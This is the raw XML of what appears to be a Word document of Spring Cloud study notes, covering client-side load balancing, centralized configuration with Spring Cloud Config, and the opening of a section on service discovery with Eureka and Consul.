    <w:p w14:paraId="24FA23DD" w14:textId="77777777" w:rsidR="004B1E96" w:rsidRPr="00CE4B95" w:rsidRDefault="004B1E96" w:rsidP="00362AEA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A38D7EE" w14:textId="2B3EA1A4" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AEA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C09A0E"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pported Load Balancing Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E2E7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strategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E842EC8"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20037817"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loud</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4022BE2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0FE4E589"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ribbon</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4681AC"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AE9999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2EB55A1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hint</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7170A2A9" w14:textId="004A77D0"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bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A46E7A" w14:textId="5453D0F5" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AEA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="462F01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ternatives to RestTemplate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648BDE5A"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ebClient (recommended in reactive apps):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4F13E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0BC2CB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LoadBalanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0D06A1"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uilder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> webClientBui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C442A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er</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DB2A31" w14:textId="44879242"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439F4FC8"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hind the Scenes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C48379"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mmunicates with Eureka to get service instance details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1303F58B"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round-robin as default load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EA6D2A" w14:textId="4D591AA9"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r w:rsidR="007D0696" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176A94E4" w14:textId="5187039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client-side load balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDE9DE1" w14:textId="5D619F07"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hardcoded URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5BC3A3" w14:textId="798A7C2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s with Eureka, Consul, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746D2AA4" w14:textId="2CD29C4C"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extend and customize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5BD97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CE4B95" w14:paraId="51001FD2" w14:textId="77777777" w:rsidTr="00362AEA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61B1ADB3"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Cloud LoadBalancer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w14:paraId="1FFFB658" w14:textId="77777777" w:rsidTr="00362AEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CD18BD7"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ide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w14:paraId="50CCD828" w14:textId="77777777" w:rsidTr="00362AEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3003141A"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nd-Robin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w14:paraId="5FDEE375" w14:textId="77777777" w:rsidTr="00362AEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D8D555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d (e.g., Eureka)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w14:paraId="2045183D" w14:textId="77777777" w:rsidTr="00362AEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04C8FC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Ribbon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w14:paraId="16131011" w14:textId="77777777" w:rsidTr="00362AEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15BF986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Template, WebClient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="745C09A8"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967" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C59ECCF" w14:textId="38630D66" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D15646">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="713" w:name="_Toc197867927"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How Spring Cloud Config helps in centralized configuration management</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="713"/>
    </w:p>
    <w:p w14:paraId="00DEB6EA" w14:textId="7012DFD1"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Spring Cloud Config?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AD75A8"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Idea:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72265427"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968" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C9699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entralized Configuration?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E3FD7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centralized config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757FF953"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maintains its own config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498CD46C"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icult to manage multiple environments (dev, test, prod)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABE0309"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nges require service restarts or redeployments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5238739A" w14:textId="77777777" w:rsidR="004B6899" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6899" w:rsidP="004B6899">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5814ACDC" w14:textId="77777777" w:rsidR="004B6899" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6899" w:rsidP="004B6899">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="067C49FB" w14:textId="77777777" w:rsidR="004B6899" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6899" w:rsidP="004B6899">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04DC5EC2" w14:textId="2C384A04" w:rsidR="004B6899" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="004B6899">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">With centralized config: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6057C32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Easier updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1214477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lastRenderedPageBreak/>
        <w:t>Environment</w:t>
      </w:r>
      <w:r w:rsidR="004B6899"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separation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5D76BB"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Consistent versioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268734E8" w14:textId="081C3658" w:rsidR="00C01003"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Reloadable configs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C056A72"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969" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D159CC"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of Spring Cloud Config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086EE4C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fig Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214AFE2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sts the configuration files centrally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55042A67"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fig Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDB994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970" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B1F74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et It Up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6719C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Create a Git Repo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4455DF9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ucture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5F487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onfig-repo/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646AE5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application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E4E0C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user-service-dev.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E91130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order-service-prod.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E94E039"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971" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="006A9FE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Create a Spring Cloud Config Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689D24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6F8EDD6D"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EnableConfigServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D19A01"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figServer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DF87F"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2FBB3"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nfigServer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67EDA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70A226" w14:textId="2EE5DB4E"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C0C212"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p w14:paraId="49830E56"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43C9E63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888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33909D53"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0437B"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559A6B8"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2B5D9CF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415A7097"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rver</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459E1CAF"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git</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE82315" w14:textId="17434880"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s</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github.com/my-org/my-config-repo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B185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972" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D979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dependency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F69DBB4"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config'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634188E0" w14:textId="77777777" w:rsidR="005D6B26" w:rsidRPr="00CE4B95" w:rsidRDefault="005D6B26" w:rsidP="00C01003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E918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ient bootstrap.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CE5E3B"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201C7E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application</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695F249C"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p>
    <w:p w14:paraId="020C754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32FAE667"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5E65C234"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8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001C86B8" w14:textId="36634264"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07B89F60" w14:textId="43A7AE16" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50C6EBB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973" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4D63AE"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fresh Config at Runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F5FDC1"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is to your microservice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A8212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boot:spring-boot-starter-actuator'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150DE84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able refresh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFF171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lastRenderedPageBreak/>
        <w:t>@RefreshScope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442621A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05E4E785"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m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29E7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ustom.property}"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D67AE6"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DB3836C" w14:textId="59C54953"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A91785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ll:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E78C50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http://localhost:{port}/actuator/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2AC5F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974" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F8EE8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E4B95" w14:paraId="685109EC" w14:textId="77777777" w:rsidTr="00C01003">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59E325BA"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r>
      <w:tr w:rsidR="00C01003" w:rsidRPr="00CE4B95" w14:paraId="199F166E" w14:textId="77777777" w:rsidTr="00C01003">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07F6905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lace to manage all properties</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C01003" w:rsidRPr="00CE4B95" w14:paraId="68683C65" w14:textId="77777777" w:rsidTr="00C01003">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="072C3801"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lbacks &amp; audits made easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C01003" w:rsidRPr="00CE4B95" w14:paraId="25131F81" w14:textId="77777777" w:rsidTr="00C01003">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01E1CB6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tarts needed (with @RefreshScope)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C01003" w:rsidRPr="00CE4B95" w14:paraId="3CB565CA" w14:textId="77777777" w:rsidTr="00C01003">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69AC64F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dev, test, prod environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C01003" w:rsidRPr="00CE4B95" w14:paraId="3DF0FA8D" w14:textId="77777777" w:rsidTr="00C01003">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="160ED1A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other Spring Cloud modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60C8C8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975" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C3383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9518D0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 for Vault for secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189AF0C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ull config from file system, Git, SVN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B12AEA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secured with OAuth2 or JWT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C1DE6E"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Spring Boot Admin and Actuator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367F058B"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976" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4204685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3E235F9E"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E4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>💼📁</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1808F6"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977" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1BF031" w14:textId="7F18D296" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="004D0941">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="714" w:name="_Toc197867928"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Service discovery using Eureka or Consul</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="714"/>
    </w:p>
    <w:p w14:paraId="24AC5A00" w14:textId="150C4DA0" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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wo popular tools for service discovery in Spring Boot applications are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Here's how both work and how you can use them in your Spring Boot application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045A253C"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Eureka (by Netflix)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115313B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 is a REST-based service that provides service discovery and registration. It's often used in Spring Cloud for microservice architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B29192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32B8015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w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Microservices register themselves with Eureka, so other services can discover them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58195AD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Clients can query Eureka to discover instances of services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBF1FA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 Eureka provides health check functionality, allowing it to determine if a service is still available and remove it from the registry if it fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422E4E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ult Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Eureka helps ensure that services remain discoverable even when one or more instances are down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057E5A0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Eureka in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B51978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642E60E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spring-cloud-starter-netflix-eureka-server dependency to create a Eureka Server and the spring-cloud-starter-netflix-eureka-client dependency for services to act as Eureka clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6248F98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 Eureka Server Dependency --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24998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100B8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3A4E8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server&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686B57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7911EE9C" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FFBC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lt;!-- Eureka Client Dependency --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39279B4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F7DAAF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5313D4D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client&lt;/artifactId&gt;</w:t>
      </w:r>
